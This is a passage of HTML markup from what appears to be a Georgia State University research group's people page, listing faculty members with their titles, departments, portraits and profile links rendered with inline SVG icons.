0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 